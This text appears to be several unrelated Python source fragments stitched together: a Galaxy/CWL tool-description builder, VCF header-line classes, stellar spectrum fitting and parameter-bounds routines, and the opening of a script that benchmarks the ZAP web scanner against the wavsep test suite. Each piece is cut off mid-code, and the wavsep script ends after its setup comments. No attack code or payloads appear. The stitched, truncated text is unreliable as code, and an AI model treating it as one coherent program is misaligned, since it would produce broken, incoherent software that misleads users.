{%- if help %}
{{ help|indent(2) }}
{%- else %}
TODO: Fill in description.
{%- endif %}
"""
CWL_TEST_TEMPLATE = """
- doc: test generated from example command
job: {{ job_filename }}
{%- if outputs %}
outputs:
{%- for output in outputs %}
{{ output.id }}:
path: test-data/{{ output.example_value }}
{%- endfor %}
{%- else %}
outputs: TODO
{%- endif %}
"""
CWL_JOB_TEMPLATE = """
{%- if inputs %}
{%- for input in inputs %}
{%- if input.type == "File" %}
{{ input.id }}:
class: File
path: test-data/{{ input.example_value }}
{%- else %}
{{ input.id }}: {{ input.example_value }}
{%- endif %}
{%- endfor %}
{%- else %}
# TODO: Specify job input.
{}
{%- endif %}
"""
def build(**kwds):
"""Build up a :func:`ToolDescription` from supplid arguments."""
if kwds.get("cwl"):
builder = _build_cwl
else:
builder = _build_galaxy
return builder(**kwds)
def _build_cwl(**kwds):
_handle_help(kwds)
_handle_requirements(kwds)
assert len(kwds["containers"]) <= 1, kwds
command_io = CommandIO(**kwds)
render_kwds = {
"cwl_version": DEFAULT_CWL_VERSION,
"help": kwds.get("help", ""),
"containers": kwds.get("containers", []),
"requirements": kwds.get("requirements", []),
"id": kwds.get("id"),
"label": kwds.get("name"),
}
render_kwds.update(command_io.cwl_properties())
contents = _render(render_kwds, template_str=CWL_TEMPLATE)
tool_files = []
test_files = []
if kwds["test_case"]:
sep = "-" if "-" in kwds.get("id") else "_"
tests_path = "%s%stests.yml" % (kwds.get("id"), sep)
job_path = "%s%sjob.yml" % (kwds.get("id"), sep)
render_kwds["job_filename"] = job_path
test_contents = _render(render_kwds, template_str=CWL_TEST_TEMPLATE)
job_contents = _render(render_kwds, template_str=CWL_JOB_TEMPLATE)
tool_files.append(ToolFile(tests_path, test_contents, "test"))
tool_files.append(ToolFile(job_path, job_contents, "job"))
for cwl_input in render_kwds["inputs"] or []:
if cwl_input.type == "File" and cwl_input.example_value:
test_files.append(cwl_input.example_value)
for cwl_output in render_kwds["outputs"] or []:
if cwl_output.example_value:
test_files.append(cwl_output.example_value)
return ToolDescription(
contents,
tool_files=tool_files,
test_files=test_files
)
def _build_galaxy(**kwds):
# Test case to build up from supplied inputs and outputs, ultimately
# ignored unless kwds["test_case"] is truthy.
_handle_help(kwds)
# process raw cite urls
cite_urls = kwds.get("cite_url", [])
del kwds["cite_url"]
citations = list(map(UrlCitation, cite_urls))
kwds["bibtex_citations"] = citations
# handle requirements and containers
_handle_requirements(kwds)
command_io = CommandIO(**kwds)
kwds["inputs"] = command_io.inputs
kwds["outputs"] = command_io.outputs
kwds["command"] = command_io.cheetah_template
test_case = command_io.test_case()
# finally wrap up tests
tests, test_files = _handle_tests(kwds, test_case)
kwds["tests"] = tests
# Render tool content from template.
contents = _render(kwds)
tool_files = []
append_macro_file(tool_files, kwds)
return ToolDescription(
contents,
tool_files=tool_files,
test_files=test_files
)
def append_macro_file(tool_files, kwds):
macro_contents = None
if kwds["macros"]:
macro_contents = _render(kwds, MACROS_TEMPLATE)
macros_file = "macros.xml"
if not os.path.exists(macros_file):
tool_files.append(ToolFile(macros_file, macro_contents, "macros"))
io.info(REUSING_MACROS_MESSAGE)
class CommandIO(object):
def __init__(self, **kwds):
command = _find_command(kwds)
cheetah_template = command
# process raw inputs
inputs = kwds.pop("input", [])
inputs = list(map(Input, inputs or []))
# alternatively process example inputs
example_inputs = kwds.pop("example_input", [])
for i, input_file in enumerate(example_inputs or []):
name = "input%d" % (i + 1)
inputs.append(Input(input_file, name=name, example=True))
cheetah_template = _replace_file_in_command(cheetah_template, input_file, name)
# handle raw outputs (from_work_dir ones) as well as named_outputs
outputs = kwds.pop("output", [])
outputs = list(map(Output, outputs or []))
named_outputs = kwds.pop("named_output", [])
for named_output in (named_outputs or []):
outputs.append(Output(name=named_output, example=False))
# handle example outputs
example_outputs = kwds.pop("example_output", [])
for i, output_file in enumerate(example_outputs or []):
name = "output%d" % (i + 1)
from_path = output_file
use_from_path = True
if output_file in cheetah_template:
# Actually found the file in the command, assume it can
# be specified directly and skip from_work_dir.
use_from_path = False
output = Output(name=name, from_path=from_path,
use_from_path=use_from_path, example=True)
outputs.append(output)
cheetah_template = _replace_file_in_command(cheetah_template, output_file, output.name)
self.inputs = inputs
self.outputs = outputs
self.command = command
self.cheetah_template = cheetah_template
def example_input_names(self):
for input in self.inputs:
if input.example:
yield input.input_description
def example_output_names(self):
for output in self.outputs:
if output.example:
yield output.example_path
def cwl_lex_list(self):
if not self.command:
return []
command_parts = shlex.split(self.command)
parse_list = []
input_count = 0
output_count = 0
index = 0
prefixed_parts = []
while index < len(command_parts):
value = command_parts[index]
eq_split = value.split("=")
prefix = None
if not _looks_like_start_of_prefix(index, command_parts):
index += 1
elif len(eq_split) == 2:
prefix = Prefix(eq_split[0] + "=", False)
value = eq_split[1]
index += 1
else:
prefix = Prefix(value, True)
value = command_parts[index + 1]
index += 2
prefixed_parts.append((prefix, value))
for position, (prefix, value) in enumerate(prefixed_parts):
if value in self.example_input_names():
input_count += 1
input = CwlInput(
"input%d" % input_count,
position,
prefix,
value,
)
parse_list.append(input)
elif value in self.example_output_names():
output_count += 1
output = CwlOutput(
"output%d" % output_count,
position,
prefix,
value,
)
parse_list.append(output)
elif prefix:
param_id = prefix.prefix.lower().rstrip("=")
type_ = param_type(value)
input = CwlInput(
param_id,
position,
prefix,
value,
type_=type_,
)
parse_list.append(input)
else:
part = CwlCommandPart(value, position, prefix)
parse_list.append(part)
return parse_list
def cwl_properties(self):
base_command = []
arguments = []
inputs = []
outputs = []
lex_list = self.cwl_lex_list()
index = 0
while index < len(lex_list):
token = lex_list[index]
if isinstance(token, CwlCommandPart):
base_command.append(token.value)
else:
break
index += 1
while index < len(lex_list):
token = | |
more than once: {}, using first" "occurence").format(
line.key, line.mapping["ID"]
),
DuplicateHeaderLineWarning,
)
else:
result[line.key][line.mapping["ID"]] = line
else:
result.setdefault(line.key, [])
result[line.key].append(line)
return result
def copy(self):
"""Return a copy of this header"""
return Header([line.copy() for line in self.lines], self.samples.copy())
def add_filter_line(self, mapping):
"""Add FILTER header line constructed from the given mapping
:param mapping: ``OrderedDict`` with mapping to add. It is
recommended to use ``OrderedDict`` over ``dict`` as this makes
the result reproducible
:return: ``False`` on conflicting line and ``True`` otherwise
"""
return self.add_line(FilterHeaderLine.from_mapping(mapping))
def add_contig_line(self, mapping):
"""Add "contig" header line constructed from the given mapping
:param mapping: ``OrderedDict`` with mapping to add. It is
recommended to use ``OrderedDict`` over ``dict`` as this makes
the result reproducible
:return: ``False`` on conflicting line and ``True`` otherwise
"""
return self.add_line(ContigHeaderLine.from_mapping(mapping))
def add_info_line(self, mapping):
"""Add INFO header line constructed from the given mapping
:param mapping: ``OrderedDict`` with mapping to add. It is
recommended to use ``OrderedDict`` over ``dict`` as this makes
the result reproducible
:return: ``False`` on conflicting line and ``True`` otherwise
"""
return self.add_line(InfoHeaderLine.from_mapping(mapping))
def add_format_line(self, mapping):
"""Add FORMAT header line constructed from the given mapping
:param mapping: ``OrderedDict`` with mapping to add. It is
recommended to use ``OrderedDict`` over ``dict`` as this makes
the result reproducible
:return: ``False`` on conflicting line and ``True`` otherwise
"""
return self.add_line(FormatHeaderLine.from_mapping(mapping))
def format_ids(self):
"""Return list of all format IDs"""
return list(self._indices["FORMAT"].keys())
def filter_ids(self):
"""Return list of all filter IDs"""
return list(self._indices["FILTER"].keys())
def info_ids(self):
"""Return list of all info IDs"""
return list(self._indices["INFO"].keys())
def get_lines(self, key):
"""Return header lines having the given ``key`` as their type"""
if key in self._indices:
return self._indices[key].values()
else:
return []
def has_header_line(self, key, id_):
"""Return whether there is a header line with the given ID of the
type given by ``key``
:param key: The VCF header key/line type.
:param id_: The ID value to compare fore
:return: ``True`` if there is a header line starting with ``##${key}=``
in the VCF file having the mapping entry ``ID`` set to ``id_``.
"""
if key not in self._indices:
return False
else:
return id_ in self._indices[key]
def add_line(self, header_line):
"""Add header line, updating any necessary support indices
:return: ``False`` on conflicting line and ``True`` otherwise
"""
self.lines.append(header_line)
self._indices.setdefault(header_line.key, OrderedDict())
if not hasattr(header_line, "mapping"):
return False # no registration required
if self.has_header_line(header_line.key, header_line.mapping["ID"]):
warnings.warn(
(
"Detected duplicate header line with type {} and ID {}. "
"Ignoring this and subsequent one"
).format(header_line.key, header_line.mapping["ID"]),
DuplicateHeaderLineWarning,
)
return False
else:
self._indices[header_line.key][header_line.mapping["ID"]] = header_line
return True
def get_info_field_info(self, key):
"""Return :py:class:`FieldInfo` for the given INFO field"""
return self._get_field_info("INFO", key)
def get_format_field_info(self, key):
"""Return :py:class:`FieldInfo` for the given INFO field"""
return self._get_field_info("FORMAT", key)
def _get_field_info(self, type_, key):
result = self._indices[type_].get(key)
if result:
return result
if key in RESERVED_INFO:
res = FieldInfo(RESERVED_INFO[key].type, RESERVED_INFO[key].number)
else:
res = FieldInfo("String", HEADER_NUMBER_UNBOUNDED)
warnings.warn(
"{} {} not found using {}/{} instead".format(type_, key, res.type, repr(res.number)),
FieldInfoNotFound,
)
return res
def __eq__(self, other):
if isinstance(other, self.__class__):
return (self.lines, self.samples) == (other.lines, other.samples)
return NotImplemented
def __ne__(self, other):
if isinstance(other, self.__class__):
return (self.lines, self.samples) != (other.lines, other.samples)
return NotImplemented
def __hash__(self):
raise TypeError("Unhashable type: Header")
def __str__(self):
tpl = "Header(lines={}, samples={})"
return tpl.format(*map(repr, (self.lines, self.samples)))
def __repr__(self):
return str(self)
class HeaderLine:
"""Base class for VCF header lines
"""
def __init__(self, key, value):
#: ``str`` with key of header line
self.key = key
# ``str`` with raw value of header line
self._value = value
def copy(self):
"""Return a copy"""
return self.__class__(self.key, self.value)
@property
def value(self):
return self._value
def serialize(self):
"""Return VCF-serialized version of this header line"""
return "".join(("##", self.key, "=", self.value))
def __eq__(self, other):
if isinstance(other, self.__class__):
return (self.key, self.value) == (other.key, other.value)
return NotImplemented
def __ne__(self, other):
if isinstance(other, self.__class__):
return (self.key, self.value) != (other.key, other.value)
return NotImplemented
def __hash__(self):
raise TypeError("Unhashable type: HeaderLine")
def __str__(self):
return "HeaderLine({}, {})".format(*map(repr, (self.key, self.value)))
def __repr__(self):
return str(self)
def mapping_to_str(mapping):
"""Convert mapping to string"""
result = ["<"]
for i, (key, value) in enumerate(mapping.items()):
if i > 0:
result.append(",")
result += [key, "=", serialize_for_header(key, value)]
result += [">"]
return "".join(result)
class SimpleHeaderLine(HeaderLine):
"""Base class for simple header lines, currently contig and filter
header lines
Don't use this class directly but rather the sub classes.
:raises: :py:class:`vcfpy.exceptions.InvalidHeaderException` in
the case of missing key ``"ID"``
"""
def __init__(self, key, value, mapping):
super().__init__(key, value)
# check existence of key "ID"
if "ID" not in mapping:
raise exceptions.InvalidHeaderException(
'Missing key "ID" in header line "{}={}"'.format(key, value)
)
#: ``collections.OrderedDict`` with key/value mapping of the attributes
self.mapping = OrderedDict(mapping.items())
def copy(self):
"""Return a copy"""
mapping = OrderedDict(self.mapping.items())
return self.__class__(self.key, self.value, mapping)
@property
def value(self):
return mapping_to_str(self.mapping)
def serialize(self):
return "".join(map(str, ["##", self.key, "=", self.value]))
def __str__(self):
return "SimpleHeaderLine({}, {}, {})".format(
*map(repr, (self.key, self.value, self.mapping))
)
def __eq__(self, other):
if isinstance(other, self.__class__):
return (self.key, self.value, self.mapping) == (other.key, other.value, other.mapping)
return NotImplemented
def __ne__(self, other):
if isinstance(other, self.__class__):
return (self.key, self.value, self.mapping) != (other.key, other.value, other.mapping)
return NotImplemented
class AltAlleleHeaderLine(SimpleHeaderLine):
"""Alternative allele header line
Mostly used for defining symbolic alleles for structural variants and
IUPAC ambiguity codes
"""
@classmethod
def from_mapping(klass, mapping):
"""Construct from mapping, not requiring the string value"""
return AltAlleleHeaderLine("ALT", mapping_to_str(mapping), mapping)
def __init__(self, key, value, mapping):
super().__init__(key, value, mapping)
#: name of the alternative allele
self.id = self.mapping["ID"]
def __hash__(self):
raise TypeError("Unhashable type: AltAlleleHeaderLine")
def __str__(self):
return "AltAlleleHeaderLine({}, {}, {})".format(
*map(repr, (self.key, self.value, self.mapping))
)
class ContigHeaderLine(SimpleHeaderLine):
"""Contig header line
Most importantly, parses the ``'length'`` key into an integer
"""
@classmethod
def from_mapping(klass, mapping):
"""Construct from mapping, not requiring the string value"""
return ContigHeaderLine("contig", mapping_to_str(mapping), mapping)
def __init__(self, key, value, mapping):
super().__init__(key, value, mapping)
# convert 'length' entry to integer if possible
if "length" in self.mapping:
mapping["length"] = int(mapping["length"])
else:
warnings.warn(
'Field "length" not found in header line {}={}'.format(key, value),
FieldInfoNotFound,
)
#: name of the contig
self.id = self.mapping["ID"]
#: length of the contig, ``None`` if missing
self.length = self.mapping.get("length")
def __hash__(self):
raise TypeError("Unhashable type: ContigHeaderLine")
def __str__(self):
return "ContigHeaderLine({}, {}, {})".format(
*map(repr, (self.key, self.value, self.mapping))
)
class FilterHeaderLine(SimpleHeaderLine):
"""FILTER header line
"""
@classmethod
def from_mapping(klass, mapping):
"""Construct from mapping, not requiring the string value"""
return FilterHeaderLine("FILTER", mapping_to_str(mapping), mapping)
def __init__(self, key, value, mapping):
super().__init__(key, value, mapping)
# check for "Description" key
if "Description" not in self.mapping:
warnings.warn(
'Field "Description" not found in header line {}={}'.format(key, value),
FieldInfoNotFound,
)
#: token for the filter
self.id = self.mapping["ID"]
#: description for the filter, ``None`` if missing
self.description = self.mapping.get("Description")
def __hash__(self):
raise TypeError("Unhashable type: FilterHeaderLine")
def __str__(self):
return "FilterHeaderLine({}, {}, {})".format(
*map(repr, (self.key, self.value, self.mapping))
)
class MetaHeaderLine(SimpleHeaderLine):
"""Alternative allele header line
Used for defining set of valid values for samples keys
"""
@classmethod
def from_mapping(klass, mapping):
"""Construct from mapping, not requiring the string value"""
return MetaHeaderLine("META", mapping_to_str(mapping), mapping)
def __init__(self, key, value, mapping):
super().__init__(key, value, mapping)
#: name of the alternative allele
self.id = self.mapping["ID"]
def __hash__(self):
raise TypeError("Unhashable type: MetaHeaderLine")
def __str__(self):
return "MetaHeaderLine({}, {}, {})".format(*map(repr, (self.key, self.value, self.mapping)))
class PedigreeHeaderLine(SimpleHeaderLine):
"""Header line for defining a pedigree entry
"""
@classmethod
def from_mapping(klass, mapping):
"""Construct from mapping, not requiring the string value"""
return PedigreeHeaderLine("PEDIGREE", mapping_to_str(mapping), mapping)
def __init__(self, key, value, mapping):
super().__init__(key, value, mapping)
#: name of the alternative allele
self.id = self.mapping["ID"]
def __hash__(self):
raise TypeError("Unhashable type: PedigreeHeaderLine")
def __str__(self):
return "PedigreeHeaderLine({}, {}, {})".format(
*map(repr, (self.key, self.value, self.mapping))
)
class SampleHeaderLine(SimpleHeaderLine):
"""Header line for defining a SAMPLE entry
"""
@classmethod
def from_mapping(klass, mapping):
"""Construct from mapping, not requiring the string value"""
return SampleHeaderLine("SAMPLE", mapping_to_str(mapping), mapping)
def __init__(self, key, value, mapping):
super().__init__(key, value, mapping)
#: name of the alternative allele
self.id = self.mapping["ID"]
def __eq__(self, other):
if isinstance(other, self.__class__):
return (self.key, self.value, self.mapping) == (other.key, other.value, other.mapping)
return NotImplemented
def __ne__(self, other):
if isinstance(other, self.__class__):
return (self.key, self.value, self.mapping) != (other.key, other.value, other.mapping)
return NotImplemented
def __hash__(self):
raise TypeError("Unhashable type: SampleHeaderLine")
def __str__(self):
return "SampleHeaderLine({}, {}, {})".format(
*map(repr, (self.key, self.value, self.mapping))
)
class CompoundHeaderLine(HeaderLine):
"""Base class for compound header lines, currently format and header lines
Compound header lines describe | |
for o in range(lsf.norder):
wobs = wave[:,o]
dw = np.median(dln.slope(wobs))
wv1,ind1 = dln.closest(synspec.wave,np.min(wobs)-2*np.abs(dw))
wv2,ind2 = dln.closest(synspec.wave,np.max(wobs)+2*np.abs(dw))
modelflux = synspec.flux[ind1:ind2+1]
modelwave = synspec.wave[ind1:ind2+1]
modelcont = synspec.cont[ind1:ind2+1]
# Rebin, if necessary
# get LSF FWHM (A) for a handful of positions across the spectrum
xp = np.arange(npix//20)*20
fwhm = lsf.fwhm(wobs[xp],xtype='Wave',order=o)
# FWHM is in units of lsf.xtype, convert to wavelength/angstroms, if necessary
if lsf.xtype.lower().find('pix')>-1:
fwhm *= np.abs(dw)
# convert FWHM (A) in number of model pixels at those positions
dwmod = dln.slope(modelwave)
dwmod = np.hstack((dwmod,dwmod[-1]))
xpmod = dln.interp(modelwave,np.arange(len(modelwave)),wobs[xp],kind='cubic',assume_sorted=False,extrapolate=True)
xpmod = np.round(xpmod).astype(int)
fwhmpix = np.abs(fwhm/dwmod[xpmod])
# need at least ~4 pixels per LSF FWHM across the spectrum
# using 3 affects the final profile shape
nbin = np.round(np.min(fwhmpix)//4).astype(int)
if np.min(fwhmpix) < 3.7:
warnings.warn('Model has lower resolution than the observed spectrum. Only '+str(np.min(fwhmpix))+' model pixels per resolution element')
if np.min(fwhmpix) < 2.8:
raise Exception('Model has lower resolution than the observed spectrum. Only '+str(np.min(fwhmpix))+' model pixels per resolution element')
if nbin>1:
npix2 = np.round(len(synspec.flux) // nbin).astype(int)
modelflux = dln.rebin(modelflux[0:npix2*nbin],npix2)
modelwave = dln.rebin(modelwave[0:npix2*nbin],npix2)
modelcont = dln.rebin(modelcont[0:npix2*nbin],npix2)
# Convolve
lsf2d = lsf.anyarray(modelwave,xtype='Wave',order=o,original=False)
cflux = utils.convolve_sparse(modelflux,lsf2d)
# Interpolate onto final wavelength array
flux = synple.interp_spl(wobs, modelwave, cflux)
cont = synple.interp_spl(wobs, modelwave, modelcont)
pspec.flux[:,o] = flux
pspec.cont[:,o] = cont
pspec.normalized = True
# Normalize
if norm is True:
newcont = pspec.continuum_func(pspec)
pspec.flux /= newcont
pspec.cont *= newcont
return pspec
def mkbounds(params,paramlims=None):
""" Make lower and upper boundaries for parameters """
params = np.char.array(params).upper()
if paramlims is not None:
limkeys = np.char.array(list(paramlims.keys())).upper()
n = len(params)
lbounds = np.zeros(n,np.float64)
ubounds = np.zeros(n,np.float64)
# Teff
g, = np.where(params=='TEFF')
if len(g)>0:
lbounds[g[0]] = 3500
ubounds[g[0]] = 60000
# logg
g, = np.where(params=='LOGG')
if len(g)>0:
lbounds[g[0]] = 0
ubounds[g[0]] = 5
# fe_h
g, = np.where(params=='FE_H')
if len(g)>0:
lbounds[g[0]] = -3
ubounds[g[0]] = 1
# Vmicro
g, = np.where(params=='VMICRO')
if len(g)>0:
lbounds[g[0]] = 0
ubounds[g[0]] = 5
# Vsini/vrot
g, = np.where(params=='VROT')
if len(g)>0:
lbounds[g[0]] = 0
ubounds[g[0]] = 500
# RV
g, = np.where(params=='RV')
if len(g)>0:
lbounds[g[0]] = -1500
ubounds[g[0]] = 1500
# abundances
g, = np.where( (params.find('_H') != -1) & (params != 'FE_H') )
if len(g)>0:
lbounds[g] = -3
ubounds[g] = 10
# Use input parameter limits
if paramlims is not None:
for i,f in enumerate(params):
g, = np.where(limkeys==f)
if len(g)>0:
lbounds[i] = paramlims[limkeys[g[0]]][0]
ubounds[i] = paramlims[limkeys[g[0]]][1]
bounds = (lbounds,ubounds)
return bounds
def mkdxlim(fitparams):
""" Make array of parameter changes at which curve_fit should finish."""
npar = len(fitparams)
dx_lim = np.zeros(npar,float)
for k in range(npar):
if fitparams[k]=='TEFF':
dx_lim[k] = 1.0
elif fitparams[k]=='LOGG':
dx_lim[k] = 0.005
elif fitparams[k]=='VMICRO':
dx_lim[k] = 0.1
elif fitparams[k]=='VROT':
dx_lim[k] = 0.1
elif fitparams[k]=='RV':
dx_lim[k] = 0.01
elif fitparams[k].endswith('_H'):
dx_lim[k] = 0.005
else:
dx_lim[k] = 0.01
return dx_lim
def initpars(params,fitparams,bounds=None):
""" Make initial set of parameters given PARAMS and
FITPARAMS."""
params = dict((key.upper(), value) for (key, value) in params.items()) # all CAPS
fitparams = [v.upper() for v in fitparams] # all CAPS
npars = len(fitparams)
pinit = np.zeros(npars,np.float64)
# Loop over parameters
for k in range(npars):
ind, = np.where(np.char.array(list(params.keys()))==fitparams[k])
# This parameter is in PARAMS
if len(ind)>0:
pinit[k] = params[fitparams[k]]
# Not in PARAMS
else:
if fitparams[k]=='RV':
pinit[k] = 0.0
elif fitparams[k]=='VMICRO':
pinit[k] = 2.0
elif fitparams[k]=='VROT':
pinit[k] = 0.0
elif fitparams[k]=='TEFF':
pinit[k] = 5000.0
elif fitparams[k]=='LOGG':
pinit[k] = 3.0
elif fitparams[k].endswith('_H'):
# Abundances, use FE_H if possible
if 'FE_H' in params.keys():
pinit[k] = params['FE_H']
else:
pinit[k] = 0.0
else:
pinit[k] = 0.0
# Make sure inital parameters are within the boundary limits
if bounds is not None:
for k in range(npars):
pinit[k] = dln.limit(pinit[k],bounds[0][k],bounds[1][k])
return pinit
def specfigure(figfile,spec,fmodel,out,original=None,verbose=True,figsize=10):
""" Make diagnostic figure."""
#import matplotlib
matplotlib.use('Agg')
#import matplotlib.pyplot as plt
if os.path.exists(figfile): os.remove(figfile)
norder = spec.norder
nlegcol = 2
if original is not None: nlegcol=3
# Single-order plot
if norder==1:
fig,ax = plt.subplots()
fig.set_figheight(figsize*0.5)
fig.set_figwidth(figsize)
if original is not None:
plt.plot(original.wave,original.flux,color='green',label='Original',linewidth=1)
plt.plot(spec.wave,spec.flux,'b',label='Masked Data',linewidth=0.5)
plt.plot(fmodel.wave,fmodel.flux,'r',label='Model',linewidth=0.5,alpha=0.8)
leg = ax.legend(loc='upper left', frameon=True, framealpha=0.8, ncol=nlegcol)
plt.xlabel('Wavelength (Angstroms)')
plt.ylabel('Normalized Flux')
xr = dln.minmax(spec.wave)
yr = [np.min([spec.flux,fmodel.flux]), np.max([spec.flux,fmodel.flux])]
if original is not None:
yr = [np.min([original.flux,spec.flux,fmodel.flux]), np.max([spec.flux,fmodel.flux])]
yr = [yr[0]-dln.valrange(yr)*0.15,yr[1]+dln.valrange(yr)*0.005]
yr = [np.max([yr[0],-0.2]), np.min([yr[1],2.0])]
plt.xlim(xr)
plt.ylim(yr)
snr = np.nanmedian(spec.flux/spec.err)
plt.title(spec.filename)
#ax.annotate(r'S/N=%5.1f Teff=%5.1f$\pm$%5.1f logg=%5.2f$\pm$%5.2f [Fe/H]=%5.2f$\pm$%5.2f Vrel=%5.2f$\pm$%5.2f chisq=%5.2f' %
# (snr, out['TEFF'], out['tefferr'], out['LOGG'], out['loggerr'], out['FE_H'], out['feherr'], out['RV'], out['vrelerr'], out['chisq']),
# xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center')
# Multi-order plot
else:
fig,ax = plt.subplots(norder)
fig.set_figheight(figsize)
fig.set_figwidth(figsize)
for i in range(norder):
if original is not None:
ax[i].plot(original.wave[:,i],original.flux[:,i],color='green',label='Original',linewidth=1)
ax[i].plot(spec.wave[:,i],spec.flux[:,i],'b',label='Masked Data',linewidth=0.5)
ax[i].plot(fmodel.wave[:,i],fmodel.flux[:,i],'r',label='Model',linewidth=0.5,alpha=0.8)
if i==0:
leg = ax[i].legend(loc='upper left', frameon=True, framealpha=0.8, ncol=nlegcol)
ax[i].set_xlabel('Wavelength (Angstroms)')
ax[i].set_ylabel('Normalized Flux')
xr = dln.minmax(spec.wave[:,i])
yr = [np.min([spec.flux[:,i],fmodel.flux[:,i]]), np.max([spec.flux[:,i],fmodel.flux[:,i]])]
if original is not None:
yr = [np.min([original.flux[:,i],spec.flux[:,i],fmodel.flux[:,i]]), np.max([spec.flux[:,i],fmodel.flux[:,i]])]
yr = [yr[0]-dln.valrange(yr)*0.05,yr[1]+dln.valrange(yr)*0.05]
if i==0:
yr = [yr[0]-dln.valrange(yr)*0.15,yr[1]+dln.valrange(yr)*0.05]
yr = [np.max([yr[0],-0.2]), np.min([yr[1],2.0])]
ax[i].set_xlim(xr)
ax[i].set_ylim(yr)
# legend
if i==0:
snr = np.nanmedian(spec.flux/spec.err)
ax[i].set_title(spec.filename)
#ax[i].annotate(r'S/N=%5.1f Teff=%5.1f$\pm$%5.1f logg=%5.2f$\pm$%5.2f [Fe/H]=%5.2f$\pm$%5.2f Vrel=%5.2f$\pm$%5.2f chisq=%5.2f' %
# (snr,out['teff'],out['tefferr'],out['logg'],out['loggerr'],out['feh'],out['feherr'],out['vrel'],out['vrelerr'],out['chisq']),
# xy=(np.mean(xr), yr[0]+dln.valrange(yr)*0.05),ha='center')
plt.savefig(figfile,bbox_inches='tight')
plt.close(fig)
if verbose is True: print('Figure saved to '+figfile)
def dopvrot_lsq(spec,models=None,initpar=None,verbose=False,logger=None):
"""
Least Squares fitting with forward modeling of the spectrum.
Parameters
----------
spec : Spec1D object
The observed spectrum to match.
models : list of Cannon models, optional
A list of Cannon models to use. The default is to load all of the Cannon
models in the data/ directory and use those.
initpar : numpy array, optional
Initial estimate for [teff, logg, feh, RV, vsini], optional.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
The best-fitting Cannon model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
out, bmodel = fit_lsq(spec)
"""
if logger is None:
logger = dln.basiclogger()
# Load and prepare the Cannon models
#-------------------------------------------
if models is None:
models = cannon.models.copy()
models.prepare(spec)
# Get initial estimates
if initpar is None:
initpar = np.array([6000.0, 2.5, -0.5, 0.0, 0.0])
initpar = np.array(initpar).flatten()
# Calculate the bounds
lbounds = np.zeros(5,float)+1e5
ubounds = np.zeros(5,float)-1e5
for p in models:
lbounds[0:3] = np.minimum(lbounds[0:3],np.min(p.ranges,axis=1))
ubounds[0:3] = np.maximum(ubounds[0:3],np.max(p.ranges,axis=1))
lbounds[3] = -1000
ubounds[3] = 1000
lbounds[4] = 0.0
ubounds[4] = 500.0
bounds = (lbounds, ubounds)
# function to use with curve_fit
def spec_interp_vsini(x,teff,logg,feh,rv,vsini):
""" This returns the interpolated model for a given spectrum."""
# The "models" and "spec" must already exist outside of this function
m = models(teff=teff,logg=logg,feh=feh,rv=rv)
if m is None: # there was a problem
return np.zeros(spec.flux.shape,float).flatten()+1e30
# Broaden to vsini
if spec.norder>1:
smflux = spec.flux*0
for k in range(spec.norder):
smflux[:,k] = utils.broaden(m.wave[:,k],m.flux[:,k],vsini=vsini)
else:
smflux = utils.broaden(m.wave.flatten(),m.flux.flatten(),vsini=vsini)
return smflux.flatten()
def spec_interp_vsini_jac(x,*args):
""" Compute the Jacobian matrix (an m-by-n matrix, where element (i, j)
is the partial derivative of f[i] with respect to x[j]). """
relstep = 0.02
npix = len(x)
npar = len(args)
# Current values
f0 = spec_interp_vsini(x,*args)
# Initialize jacobian matrix
jac = np.zeros((npix,npar),np.float64)
# Loop over parameters
for i in range(npar):
pars = np.array(copy.deepcopy(args))
step = relstep*pars[i]
if step<=0.0:
step = 0.02
pars[i] += step
f1 = spec_interp_vsini(x,*pars)
jac[:,i] = (f1-f0)/step
return jac
# Use curve_fit
lspars, lscov = curve_fit(spec_interp_vsini, spec.wave.flatten(), spec.flux.flatten(), sigma=spec.err.flatten(),
p0=initpar, bounds=bounds, jac=spec_interp_vsini_jac)
# If it hits a boundary then the solution won't change much compared to initpar
# setting absolute_sigma=True gives crazy low lsperror values
lsperror = np.sqrt(np.diag(lscov))
if verbose is True:
logger.info('Least Squares RV and stellar parameters:')
for k,n in enumerate(['Teff','logg','[Fe/H]','RV','Vsini']):
logger.info('%s = %f' % (n,lspars[k]))
lsmodel = spec_interp_vsini(spec.wave,teff=lspars[0],logg=lspars[1],feh=lspars[2],rv=lspars[3],vsini=lspars[4])
lschisq = np.sqrt(np.sum(((spec.flux.flatten()-lsmodel)/spec.err.flatten())**2)/len(lsmodel))
if verbose is True: logger.info('chisq = %5.2f' % lschisq)
# Put it into the output structure
npar = len(lspars)
dtype = np.dtype([('pars',float,npar),('parerr',float,npar),('parcov',float,(npar,npar)),('chisq',float)])
out = np.zeros(1,dtype=dtype)
out['pars'] = lspars
out['parerr'] = lsperror
out['parcov'] = lscov
out['chisq'] = lschisq
return out, lsmodel
def fit_elem(spec,params,elem,verbose=0,alinefile=None,mlinefile=None,logger=None):
""" Fit an individual element."""
t0 = time.time()
if logger is None:
logger = dln.basiclogger()
# Create fitparams
#fitparams = | |
<filename>python/scripts/wavsep/wavsep.py<gh_stars>1-10
# Zed Attack Proxy (ZAP) and its related class files.
#
# ZAP is an HTTP/HTTPS proxy for assessing web application security.
#
# Copyright 2012 ZAP Development Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script tests ZAP against wavsep: http://code.google.com/p/wavsep/
# Note wavsep has to be installed somewhere - the above link is to the
# project not the test suite!
#
# To this script:
# * Install the ZAP Python API:
# Use 'pip install python-owasp-zap-v2' or
# download from https://github.com/zaproxy/zaproxy/wiki/Downloads
# * Start ZAP (as this is for testing purposes you might not want the
# 'standard' ZAP to be started)
# * Access wavsep via your browser, proxying through ZAP
# * Vist all of the wavsep top level URLs, eg
# http://localhost:8080/wavsep/index-active.jsp
# http://localhost:8080/wavsep/index-passive.jsp
# * Run the Spider against http://localhost:8080
# * Run the Active Scanner against http://localhost:8080/wavsep
# * Run this script
# * Open the report.html file generated in your browser
#
# Notes:
# This has been tested against wavsep 1.5
from zapv2 import ZAPv2
import datetime, sys, getopt
def main(argv):
# -------------------------------------------------------------------------
# Default Configurations - use -h and -p for different host and port
# -------------------------------------------------------------------------
